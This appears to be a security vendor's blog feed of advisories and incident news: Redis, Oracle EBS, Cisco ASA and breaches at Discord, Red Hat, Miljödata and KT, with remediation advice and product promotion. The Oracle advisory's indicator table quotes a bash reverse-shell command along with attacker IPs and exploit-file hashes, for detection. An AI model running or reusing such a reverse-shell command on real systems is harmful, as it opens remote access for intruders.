Author: Gargi

Security Advisory

Critical Lua Sandbox Escape Flaw in Redis Allows Remote Code Execution (RCE)

Summary: Security Advisory: A critical vulnerability has been found in the Lua scripting engine of Redis, enabled by default in all versions, allows authenticated attackers to break out of the Lua sandbox and perform remote code execution (RCE) to gain full control of the affected system.

OEMRedis
SeverityCritical
CVSS Score10.0
CVEsCVE-2025-49844
POC AvailableYes
Actively ExploitedNo
Exploited in WildNo
Advisory Version1.0

Overview

Since Redis is used in most cloud environments the impact is highly critical. Redis team has released the patches and urged for immediate updates recommended to secure systems.

Vulnerability NameCVE IDProduct AffectedSeverityFixed Version
Lua Use-After-Free RCE Vulnerability  CVE-2025-49844All Redis Software & OSS/CE/Stack versions with Lua scripting  CriticalRedis Software: 7.22.2-12+, 7.8.6-207+, 7.4.6-272+, 7.2.4-138+, 6.4.2-131+ Redis OSS/CE: 8.2.2+, 8.0.4+, 7.4.6+, 7.2.11+ Redis Stack: 7.4.0-v7+, 7.2.0-v19+

Technical Summary

The vulnerability comes from a use-after-free (UAF) bug in Redis’s Lua scripting system, caused by improper checks during memory cleanup. Authenticated attackers can send malicious Lua scripts via EVAL or EVALSHA commands to manipulate memory, bypass the sandbox, and run arbitrary code. Even internal servers are at risk if attackers gain network access, making this flaw highly critical for both exposed and internal environments.

CVE IDSystem AffectedVulnerability DetailsImpact
CVE-2025-49844All Redis Software & OSS/CE/Stack below the fixed versionA user after free in the Lua garbage collector allows memory corruption via crafted scripts, enabling sandbox escape and RCERemote Code Execution

Recommendations

Upgrade to the below  fixed versions immediately.

  • Redis Software: 7.22.2-12+, 7.8.6-207+, 7.4.6-272+, 7.2.4-138+, 6.4.2-131+
  • Redis OSS/CE: 8.2.2+, 8.0.4+, 7.4.6+, 7.2.11+
  • Redis Stack: 7.4.0-v7+, 7.2.0-v19+

Here are some best practices

  • Enable Strong Authentication: Configure strong passwords on all the instances, ensure protected-mode is enabled (in CE and OSS) to prevent accidental exposure.
  • Network Controls: Restrict access to authorized IPs using firewalls or VPCs, limit access to trusted sources and prevent unauthorized connectivity.
  • Limit permissions: To enhance security, user needs to give minimum necessary permissions.
  • Monitoring: Check the logs to see if there are any suspicious activities.
  • Incident Response: If compromised, isolate systems, rotate credentials, and scan for malware.

Conclusion:
This is a critical vulnerability with a CVSS score of 10.0, affecting all Redis versions with Lua scripting. The widespread Redis usage, default insecure configurations makes this a critical threat. Immediate patching and hardening are essential to prevent full system compromise, data breaches, and further attacks.

References:

Blogs

DoW Announced Implementation of CSRMC to Deliver Real Time Cyber Defense, Address Legacy Shortcomming’s

Managing cyber risk across the cyber security set up of an enterprise is harder than ever and keeping architectures and systems secure also compliant can be challenging and over whelming.

DoW (Deprtament of war) recently announced implementing of a groundbreaking Cybersecurity Risk Management Construct (CSRMC).

This is a transformative framework to deliver real-time cyber defense at operational speed and its five-phase construct that ensures a hardened, verifiable, continuously monitored and actively defended environment to ensure that U.S. warfighters maintain technological superiority against rapidly evolving cyber threats.

In comparison the previous Risk management framework dependent on static checklists and manual processes . The framework failed to account for operational needs and cyber survivability requirements. 

How (CSRMC) is going to address legacy infrastructure shortcoming?

CSRMC addresses these gaps by shifting from “snapshot in time” assessments to dynamic, automated, and continuous risk management, enabling cyber defense at the speed of relevance required for modern warfare.

The construct is composed of a five-phase lifecycle and ten foundational tenets.

The Five-Phase Lifecycle

The new construct organizes cybersecurity into five phases aligned to system development and operations:

  1. Design Phase – Security is embedded at the outset, ensuring resilience is built into system architecture.
  2. Build Phase – Secure designs are implemented as systems achieve Initial Operating Capability (IOC).
  3. Test Phase – Comprehensive validation and stress testing are performed prior to Full Operating Capability (FOC).
  4. Onboard Phase – Automated continuous monitoring is activated at deployment to sustain system visibility.
  5. Operations Phase – Real-time dashboards and alerting mechanisms provide immediate threat detection and rapid response.

Ten Foundational Tenets

The CSRMC has 10 core principal

  • Automation – driving efficiency and scale
  • Critical Controls – identifying and tracking the controls that matter most to cybersecurity
  • Continuous Monitoring and ATO – enabling real-time situational awareness to achieve constant ATO posture
  • DevSecOps – supporting secure, agile development and deployment
  • Cyber Survivability – enabling operations in contested environments
  • Training – upskilling personnel to meet evolving challenges
  • Enterprise Services & Inheritance – reducing duplication and compliance burdens
  • Operationalization – ensuring stakeholders near real-time visibility of cybersecurity risk posture
  • Reciprocity – reuse assessments across systems
  • Cybersecurity Assessments – integrating threat-informed testing to validate security

“This construct represents a cultural fundamental shift in how the Department approaches cybersecurity,” said Kattie Arrington, performing the duties of the DoW CIO. “With automation, continuous monitoring, and resilience at its core, the CSRMC empowers the DoW to defend against today’s adversaries while preparing for tomorrow’s challenges.”

With the above tenants DoW is ensuring cyber survivability and mission assurance in every domain,air, land, sea, space, and cyberspace.

Addressing Cyber security risk management

Cybersecurity risk management isn’t simply the job of the security team; everyone in the organization has a role to play. Often siloed, employees and business unit leaders view risk management from their business function.

Intru360 gives security analysts and SOC managers a clear view across the organization, helping them fully understand the extent and context of an attack. It also simplifies workflows by automatically handling alerts, allowing for faster detection of both known and unknown threats.

Identify latest threats without having to purchase, implement, and oversee several solutions or find, hire, and manage a team security analyst. Unify latest threat intelligence and security technologies to prioritize the threats that pose the greatest risk to your company.

GaarudNode is an all-in-one  solution designed to empower development teams with the tools they need to secure their applications throughout the development lifecycle. By combining the power of SAST, DAST, SCA, API security, and CSPM, GaarudNode provides a comprehensive security framework that ensures your applications are built, tested, and deployed with confidence.

Mirage Cloak offers various deception methods to detect and stop threats before they cause damage. These methods include adding decoys to the network, deploying breadcrumbs on current enterprise assets, using baits as tripwires on endpoints, and setting up lures with intentionally misconfigured or vulnerable services or applications. The flexible framework also lets customers add new deception methods as needed.

BISO Analytics stands out as the pioneering security analytics platform designed to assist enterprises in effectively handling their first-party, third-party, and emerging risks, all within a single platform. This comprehensive solution facilitates a quicker and safer progression for your business.

By adopting a groundbreaking approach, BISO Analytics integrates open, data-centric cyber risk management practices, offering organizations a consolidated view of their cyber risk landscape across the entire attack surface.

BISO Analytics empowers CXO, mid-management, and operational teams with real-time, reliable, and defensible data that not only complies with regulatory standards but also aligns with the expectations of the board regarding safeguarding shareholder value and fortifying the business.

Why it is important to implement cybersecurity risk management at organisational level

Having an effective cybersecurity risk management program can only be implemented in an organization through a structured process. This requires careful planning, resource allocation and commitment to improving security framework.

Registering documents that assess risk related activities include high asset inventories like all systems and data. When risk are registered it contain records of determined risk, data theft or results of assessment and planned treatments.

Organizations that possess all documentation involving controls and their implementation level. In this scenario organizations actually understands what exactly is risk assessment and identifying what can go wrong in an organization’s system either anything that is via threats, vulnerabilities and their possible impact.

As the saying goes we can’t protect what you don’t understand and one can’t manage what they don’t assess.

Visit our website for more informed details on our products.

(Source: www.miragenews.com/war-dept-unveils-new-cybersecurity-risk-1540279/)

Security Advisory

Critical Oracle EBS 0-Day Hit by Clop Ransomware; Oracle Released Emergency Patch 

Summary : Security Advisory: Clop Ransomware aimed at extortion of emails targeting customers of Oracle E-Business Suite. The zero-day vulnerability affected Oracle EBusiness Suite (EBS), specifically the Concurrent Processing component used with BI Publisher Integration and is remotely exploitable without authentication. This allows attackers to execute arbitrary code via HTTP.

OEM Oracle 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-61882 
POC Available Yes 
Actively Exploited Yes 
Advisory Version 1.0 

Overview 

Oracle released an emergency patch and Clop ransomware group actively exploited this flaw in real-world data theft campaigns targeting vulnerable versions using by the organizations.

All EBS versions from 12.2.3 to 12.2.14 are affected and immediate patching requires mitigate the vulnerability. 

                Vulnerability Name CVE ID Product Affected Severity Affected Version 
RCE vulnerability in Oracle E-Business Suite  CVE-2025-61882 Oracle E-Business Suite  Critical 12.2.3 through 12.2.14 

Technical Summary 

The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been using by Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.

Oracle’s fix includes the patch for this flaw but also mitigates additional exploitation paths identified during their internal investigation. 

CVE ID Component Affected  Vulnerability Details Impact 
CVE-2025-61882 BI Publisher Integration A critical unauthenticated RCE in Oracle EBusiness Suite affecting the Concurrent Processing/BI Publisher integration.   Full system compromise, data theft.  

Recommendations 

Users And Administrators should immediately apply the Security Patch for CVE202561882 on all affected Oracle E-Business Suite systems: 

  • Log in to My Oracle Support. 
  • Use the patch availability document & search for the patch specific to CVE-2025-61882 for your OS and Oracle EBS version. 

Prerequisite: Ensure the October 2023 Critical Patch Update (CPU) is already installed. 

Here are some recommendations below 

  • If immediate patching is not possible, restrict HTTP/HTTP/HTTPS access to the EBS application from untrusted networks. 
  • Review server logs, network traffic and system processes to detect signs of exploitation. 
  • Monitor for known Indicators of Compromise (IoCs) provided by Oracle from the table below. 

IOCs 
 

Indicator Type Description 
200[.]107[.]207[.]26 IP Potential GET and POST activity 
185[.]181[.]60[.]11 IP Potential GET and POST activity 
sh -c /bin/bash -i >& /dev/tcp// 0>&1 Command Establish an outbound TCP connection over a specific port 
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip 
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py 
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py 

Source: Oracle 

Conclusion: 
This is the ongoing threat exploitation by the ransomware group, particularly for unpatched Oracle EBS deployments.

As this is being actively exploited in the wild, upgrade to the supported patched version and organizations should also review logs, investigate for signs of compromise using Oracle’s IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption. 

References

Blogs

Discord Security Incident Reveal Support Ticket Stolen in Third-Party Breach 

Summary 

In today’s interconnected digital world, trust often reaches beyond the main platforms to include the network of partners that support them. Recently, Discord disclosed an incident tied not to its own systems, but to a third-party customer service provider whose systems were compromised, exposing limited user information.

The company emphasized that its core infrastructure remained secure, with the issue confined to the external vendor’s network. The cyber attack appears to be financially motivated, as hackers demanded a ransom from Discord in exchange not to reveal any information that they ceased.

Breach Breakdown 

Discord confirmed that an unauthorized party gained access to the vendor’s systems by exploiting that firm’s ticketing platform. Through that entry point, attackers were able to view limited user information exchanged during support requests like names, Discord handles, emails and some contact details.

For a small number of affected users, the exposure extended to scanned government-issued IDs, such as passports or driver’s licenses, typically used to verify age or ownership. 

Discord as well clarified that its core infrastructure like chat servers, authentication databases, and private messaging systems were not breached. This wasn’t a platform intrusion, but rather a supply chain compromise through one of the company’s external service tools. 

Upon discovering the breach, Discord revoked the vendor’s access immediately, launched an internal investigation. Law enforcement agencies have also joined the effort to identify the perpetrators and prevent further misuse of stolen data. 

Discord already notified data protection authorities, contacted affected users directly via noreply@discord.com, and reviewed all vendor relationships to ensure compliance with data protection standards. The company also pledged to strengthen third-party systems and increase security oversight for partners with data access.

Additionally, Discord advised users to watch for phishing attempts and reiterated that it will never contact them by phone regarding the incident. 

Recommendations

Here are some recommendations below 

  • Always verify the sender before clicking links in security emails. 
  • Enable multifactor authentication to protect your account even if credentials leak. 
  • Stay alert for phishing emails, especially those that sound urgent or official. 
  • Keep your data footprint minimal by sharing only what’s necessary. 
  • Regularly assess vendor security and treat third-party reviews as a key defense measure. 

Conclusion 
This incident underscores that even well-secured platforms like Discord remain vulnerable through their third-party partners. It highlights the growing importance of robust vendor risk management, transparent communication, and continuous security auditing.

For users, it’s a reminder to stay cautious, enable strong authentication measures, and practice vigilance against phishing or social engineering attempts following any major data disclosure. 

Discord was created as a communication platform for gamers, who represent more than 90% of the userbase, but expanded to various other communities, allowing text messages, voice chats and video calls.

References

Blogs

Red Hat Hit by Data Breach exposing major sensitive data, including the NSA

Red Hat, has been allegedly been hit by a breach and this has been posted by Crimson Collective hackers group on Telegram. The cyber criminals claim they’ve snatched private GitHub repositories, which include sensitive data about approximately 800 customers’ networks.

Key points from the RedHat Breach

  • Data from 28,000 internal projects at Red Hat has allegedly been stolen.
  • The hacker group Crimson Collective claims to have stolen nearly 570GB of data.
  • Extortion group known as Crimson Collective posted of they gaining access to over 28,000 Red Hat repositories, containing 570.2 GB in total.
  • The data extracted data allegedly includes around 800 Customer Engagement Reports (CERs), exposing sensitive customer information, such as their network configurations.
  • The hackers posted the claims on a Telegram channel created on September 24th, 2025. As proof, the cybercriminals provided the entire file tree, a list of allegedly stolen CERs, and some other screenshots.
  • According to International Cyber Digest, these include the National Security Agency (NSA), the Department of Energy, the National Institute of Standards and Technology (NIST), IBM, Citi, Verizon, Siemens, Bosch, JPMC, HSBC, Telefonica, other major telecoms, banks, and many other organizations.

“Source code and consulting engagement reports (CERs), if leaked, can help attackers analyze internal company infrastructure and software running on that infrastructure. This makes it significantly easier and faster to identify vulnerable attack vectors for potential attackers, “ said Aras Nazarovas, information security researcher at Cybernews.

RedHat confirmed the attack

According to the attackers, they found authentication keys, full database URIs, and other private information in the Red Hat code and CERs, which they allegedly used to gain access to downstream customer infrastructure.

On Telegram, the hacker group published a complete directory listing of stolen GitHub repositories, along with a list of customer reports from the period 2020-2025.

Red Hat has confirmed the security incident relating to its GitLab instance, but declined to comment on the attackers’ specific claims regarding the GitHub repositories and customer reports. The company emphasizes that there is no reason to believe that the security issue affects other Red Hat services or products. Red Hat says it is very confident in the integrity of its software supply chain.

The CER list includes organizations from various sectors, including major international names such as Bank of America, T-Mobile, AT&T, Fidelity, and Walmart.

Extortion Demands by Hackers

The data breach on RedHat was also an attempt to contact Red Hat and get through with extortion demands. The cybercriminals received a response asking them to submit a vulnerability report to the security team.

The ticket created by cyber criminals was reportedly forwarded repeatedly to various individuals, including employees of Red Hat’s legal and security departments.

Blogs

Service Provider for Volvo NA, ‘Miljödata’ hit by Ransomware; Critical Data exposed

Third-party supplier Miljödata, for Volvo North America,hit by ransomware disclosed a data breach that exposed the personal data of its employees . The ransomware attack happened in month of August 2025. and impacted at least 25 companies. The ransomware group DataCarry claimed responsibility for the attack on Miljödata and also published allegedly stolen data on its Tor leak site.

Ransomware attacks are increasingly targeting both enterprise of all sizes across all sectors. The attack affected Scandinavian airline SAS, Boliden and included 200 Swedish municipalities. The affected systems were mostly for HR purposes that handled medical certificates, rehabilitation matters, reporting and managing work-related injuries.

The service provider of Volvo, launched an investigation into the incident with the help of cybersecurity experts, enhanced the security of its hosted environment, and is working to prevent similar security breaches in the future.

According to the data breach notification service Have I Been Pwned (HIBP), the leaked data belongs to 870,000 accounts. Exposed data includes email addresses, names, physical addresses, phone numbers, government IDs, dates of birth, and gender.

DataCarry Ransomware Group

The DataCarry ransomware group claimed responsibility for the attack on Miljödata’s Adato system, and has Miljödata’s files available for download on its dark web-based site.

Need of the hour for Enterprise security who are soft target of ransomware attack.

  • Continuously monitor to detect breached credentials, leaked databases, and threat actor’s activites in near real-time before damage gas taken full control.
  • Assessment on cyber attack module as soon as an attack was initiated and do proper full incident review to determine how attackers infiltrated enterprise network and how data exfiltrated and if there is any existing threat.
  • Authenticate backups of data that have been stored currently and if they have been encrypted or stored offline. It is responsibility of enterprise to keep immutable backup solutions to defend against any ransomware attack that may encompass from encryption and deletion attempts by threat actors.
  • Implement threat intelligence for real time alert against any external threat that gets feeder into system . Enterprise security must Include indicators of compromise (IOCs), into company’s XDR platforms for real-time alerting .
  • Include phishing simulations and enforce multi-factor authentication (MFA) across all access points.

While Volvo did not specify the exact scale of its breach, it is one of many large organizations to be caught up in the data raid. As per reports Volvo Group provided the affected individuals with 18 months of free identity protection and credit monitoring services.

Source: Volvo North America disclosed a data breach following a ransomware attack on IT provider Miljödata

Cybersecurity News

CISA Warns Critical Cisco Firewall Vulnerabilities Under Active Exploitation  

4 Actively exploited Zero-days affecting millions of devices,. This include 3 targeted by Nation-state actor “ArcaneDoor”.

Security Advisory: Cisco has released critical security updates to address two zero-day vulnerabilities referring to CVE-2025-20333 and CVE-2025-20362 in the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software.

CISA has also added in their KEV catalog and including additional actions tailored to each agency’s status in Emergency Directive ED 25-03 document.

CISA said ‘”The campaign is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution [RCE] on ASAs, as well as manipulating read-only memory (ROM) to persist through reboot and system upgrade,”.

CISA has reported that an advanced threat actor ArcaneDoor, threat actor has demonstrated a capability to successfully modify ASA ROM at least as early as 2024. These zero-day vulnerabilities in the Cisco ASA platform are also present in specific versions of Cisco Firepower appliances’ Secure Boot would detect the identified manipulation of the ROM.  

Severity Critical 
CVSS Score 9.9  
CVEs CVE-2025-20333, CVE-2025-20362 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.1 

Overview 

The flaws discovered are actively exploited in the wild which allow attackers to execute arbitrary code or access restricted endpoints without authentication. Admins are urged to immediately apply Cisco’s fixed releases to mitigate these actively exploited zero-day vulnerabilities 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Buffer Overflow Vulnerability  CVE-2025-20333  Cisco Secure Firewall Adaptive Security Appliance (ASA), Cisco Secure Firewall Threat Defense (FTD)  Critical Update to the latest version 
Missing Authorization Vulnerability CVE-2025-20362  Cisco Secure Firewall Adaptive Security Appliance (ASA), Cisco Secure Firewall Threat Defense (FTD) Medium  Update to the latest version 

Technical Summary 

Cisco has released security updates to address multiple vulnerabilities in the VPN web server of Secure Firewall ASA and FTD Software.

The most severe issue is a critical remote code execution vulnerability that could allow an authenticated attacker with valid VPN credentials to send specially crafted HTTP(S) requests and execute arbitrary code with root-level privileges, potentially resulting in full compromise of the affected device and control of its operations.

In addition, a medium-severity vulnerability was identified that could enable unauthenticated attackers to bypass access controls and access restricted web resources without authentication, potentially exposing sensitive information or limited administrative functions.

Both vulnerabilities are caused by improper validation of user-supplied HTTP(S) input, making them exploitable over the network.

Cisco has confirmed that there are no workarounds available, and administrators are strongly advised to upgrade to the fixed software versions immediately to ensure the security and integrity of their environments. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-20333  Cisco Secure Firewall ASA Software, Cisco Secure FTD Software  Improper input validation in the VPN web server enables authenticated remote users to send crafted HTTP requests that allow arbitrary code execution with root privileges. Remote Code Execution  
CVE-2025-20362  Cisco Secure Firewall ASA Software, Cisco Secure FTD Software  The VPN web server does not properly validate HTTP(S) user-supplied input. Attackers can exploit this by sending specially crafted requests to bypass authentication and access restricted URL endpoints. Unauthorized access  

Recommendations

  • Install the fixed software releases for Cisco Secure Firewall ASA and FTD Software 
  • Use the Cisco Software Checker to identify the earliest fixed release for your software version. 
  • Navigate the device management interface (Cisco Secure Firewall Management Center or Device Manager) to apply updates. 
  • Restart devices after installation and ensure auto-updates are enabled. 
  • Review the Configure Threat Detection for VPN Services section in the Cisco Secure Firewall ASA Firewall CLI Configuration Guide to enable protection against VPN-related attacks. 

Conclusion: 
These vulnerabilities present a significant risk as they are actively being exploited in the wild and can lead to complete system compromise or unauthorized access to sensitive resources.

Since no workarounds are available, applying the latest Cisco security updates is the only effective remediation. Administrators should prioritize immediate patching across all affected devices to protect their environment from ongoing exploitation attempts and ensure continued resilience of critical firewall infrastructure. 

References

Blogs Cybersecurity News

Telecom Network in New York Area Dismantled after Network Threat Detected

The US Secret Service, the agency in charge of security for the United Nations General Assembly, discovered a threatening network of over 300 servers and 10,000 SIM cards across the New York tri-state area.

The network could have “disabled cell phone towers and potentially shut down the cellular network in New York City,” Matt McCool, the special agent in charge of the Secret Service’s New York field office.

Key Points:

The network could also facilitate denial of service attacks and could send up to 30 million text messages per minute. All of the devices were found within 35 miles of the United Nations headquarters in Midtown Manhattan.

Analysis indicates cellular communications between nation-state threat actors and individuals that are known to federal law enforcement the report said.

The investigation into the devices is ongoing, the Secret Service said, but early forensic analysis indicates it was used for communications between “foreign actors” and people already known to federal law enforcement. No arrests have been announced, and investigators are still searching through the equivalent of 100,000 cell phones worth of data.

“This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City,” Matt McCool, special agent in charge of the Secret Service field office in New York, said in a video statement.

The telecommunications gear was recovered from so-called SIM farms housed in abandoned apartment buildings in at least five undisclosed sites. The devices discovered could be used to conduct a range of telecommunications attacks including disabling cell phone towers, enabling cybersecurity attacks and allowing encrypted communication between criminal groups and threat actors.

According to the Secret Service, the devices could facilitate a wide range of attacks on telecommunications systems, including disabling cell phone towers, enabling denial of service attacks.

This also allowed encrypted, anonymous communication between potential threat actors and criminal enterprises.

The forensic analysis indicates potential links between the network and overseas threat actors, as well as connections to individuals already known to federal law enforcement agencies.

According to Bloomberg, it is still unclear whether the network was connected to earlier incidents this year in which unknown individuals impersonated White House Chief of Staff Susie Wiles and Secretary of State Marco Rubio.

A full forensic review of the seized devices is ongoing as authorities continue to assess the scope and origins of the network.

Investigations started after threats to US officials

According to agents who spoke to the New York Times, the investigation began after anonymous telephonic threats were made against three US government officials earlier this year. One of the officials who was threatened worked with the Secret Service, while the other two were White House staffers.

State of crime

The agency first detected the New York-area SIM farm after it was linked to swatting incidents on Christmas Day in 2023. Those incidents involved Congresswoman Marjorie Taylor Greene and US Senator Rick Scott.

The cases were tied to two Romanian men, Thomasz Szabo and Nemanja Radovanovic, who were working with an American swatter, Alan Filion, also known as “Torswats.” All three have since been convicted on swatting-related charges.

Ben Coon, head of intelligence at cybersecurity firm Unit 221b, believes there was little foreign state involvement, and the operation is based on financial crimes.

Images released by the Secret Service showed racks of neatly arranged telecom equipment, each component numbered and labeled. Cables were carefully laid out and secured, which could mean the operation was handled by well-resourced professionals.

The operation is linked to swatting incidents, organized crime groups, and nation-state actors, with equipment seized across New York and New Jersey.

Sources: https://www.telegraphindia.com/world/us-secret-service-dismantles-telecom-threat-network-in-new-york-ahead-of-un-general-assembly/cid/2124609


Blogs

Third Party System Disruption Coordinated for Cyber attack on Major European Airlines

A third-party passenger system disruption at Heathrow may caused delays in the check-in process at Heathrow Airport and major European Airlines signaled as cyber attack. Third Party System Disruption Coordinated for Cyber attack on Major European Airlines.

The cyber attack targeted at third party vendor Collin Aerospace ,providing check-in and boarding systems for several airlines across multiple airports globally, experienced technical issue leading to flight disruption.

Heathrow Airport warned departing passengers of probable delays and urged them to monitor their flight status closely during the disruption.

Similarly Brussels Airport confirmed that automated check-in and boarding services were inoperable, forcing staff to use manual processes to handle departing passengers.

Berlin Airport also communicated the situation via a banner on its website, stating: “Due to a technical issue at a system provider operating across Europe, there are longer waiting times at check-in. We are working on a quick solution,” Berlin Airport said in a banner on its website.

As per reports the impact is limited to electronic customer check-in and baggage drop and can be mitigated with manual check-in operations,” RTX, which owns Collins Aerospace, reportedly said in a statement, adding that it had become aware of a ‘cyber-related disruption’ to its software at selected airports, without naming them. It added that it was working to fix the issue as quickly as possible.

A Highly coordinated attack by Hackers on Aviation Sector – What do we know

“The aviation industry has become an increasingly attractive target for cybercriminals because of its heavy reliance on shared digital systems,” Charlotte Wilson, head of enterprise at cybersecurity firm Check Point, told Euronews Next.

“These attacks often strike through the supply chain, exploiting third-party platforms that are used by multiple airlines and airports at once. When one vendor is compromised, the ripple effect can be immediate and far-reaching, causing widespread disruption across borders,” she added. 

Weaklink targeted in connected the ecosystem

The attack on third party ecosystem indicates that cyber security needs to be treated on high priority as IT is related and its high time airlines and aviation take cybersecurity seriously

According to a recent SecurityScorecard study, at least 29% of all breaches were attributable to a third-party attack vector, meaning the core risk originated outside of the organization.

Of these, 75% involved software or other technology products and services, with the remaining 25% stemming from non-technical products or services. These statistics highlight the digital interconnectivity across the supply chain — and the risks inherent within those relationships.

Reducing Third party cyber risk related loss

In this competitive market and aggression of cyber criminals towards vendors and third party service providers, utmost necessity and guard is required while choosing critical product and service providers. The entire ecosystem is relying for their service and this includes, where possible, identifying the critical vendors and suppliers the providers use, otherwise known as fourth-party vendors.

Verifying that third parties who have adequate cyber insurance to meet the requirements of the first-party organization. This demonstrates cyber risk management hygiene is maintained and certain controls are in place.

A strong incident response plan is maintained well ahead before any incident occurs.

(Sources: https://www.euronews.com/next/2025/09/21/what-do-we-know-about-the-cyberattacks-that-hit-europes-airports)

Blogs

𝐊𝐓 𝐓𝐞𝐥𝐞𝐜𝐨𝐦 𝐁𝐫𝐞𝐚𝐜𝐡 𝐑𝐞𝐯𝐞𝐚𝐥𝐬 𝐡𝐨𝐰 Illegal 𝐁𝐚𝐬𝐞 𝐒𝐭𝐚𝐭𝐢𝐨𝐧𝐬 Generated for 𝐇𝐚𝐜𝐤 𝐩𝐚𝐲𝐦𝐞𝐧𝐭𝐬 

Imagine you come to know small payments via your mobile phone is being carried out without your knowledge & come to know that payments are directed to small base stations created by hackers linking your service providers.

 Cyber criminals hacked ultra-small base stations accessed the KT communication network and intercepted traffic during an on-site inspection on the 8th sep.

The Telcom giant got hacked in a clever managed systematic way when the hacker has created a similar base station by stealing femtocells that are not used or under-managed. KT has disconnected the base station in question.

To prevent a recurrence, it will upgrade the management system for micro base stations and strengthen a system that monitors abnormal payment types in real time. It will convert about 2,000 stores nationwide into “Safe and Secure Specialty Stores” and provide affected customers with the “KT Safe and Secure Insurance” (tentative name) free of charge for the next three years to compensate for financial fraud linked to communication devices.

This happened when KT, the south Korean telecom provider discovered two additional illegal ultrasmall base stations, or femtocells, that were used to facilitate a large-scale micropayment scam, bringing the confirmed total to four.

The telecom giant said Thursday that the devices had leaked IMSI, IMEI and phone numbers, and that number of confirmed impacted subscribers had risen from 278 to 362 and that funds embezzled through fraudulent charges to gift cards and transit passes had reached 240 million won, or 173-thousand U.S. dollars. 

Attacks on devices

KT said no additional funds have been stolen since it blocked abnormal transactions on September 5, and that all newly confirmed cases predate that date.

In this attack type personal details such as names and birth dates were not leaked via its network and that SIM authentication keys remain secure, meaning perpetrators of the data breach do not have the ability to clone impacted users’ devices.

Mitigation steps by KT

KT said it is reimbursing victims, offering free SIM card replacements and instructing customers via its website and app, as well as text message, to keep an eye out for fraudulent charges and sign up for the carrier’s SIM protection service.

To prevent a recurrence, it will upgrade the management system for micro base stations and strengthen a system that monitors abnormal payment types in real time.

It will convert about 2,000 stores nationwide into “Safe and Secure Specialty Stores” and provide affected customers with the “KT Safe and Secure Insurance” (tentative name) free of charge for the next three years to compensate for financial fraud linked to communication devices.

Scroll to top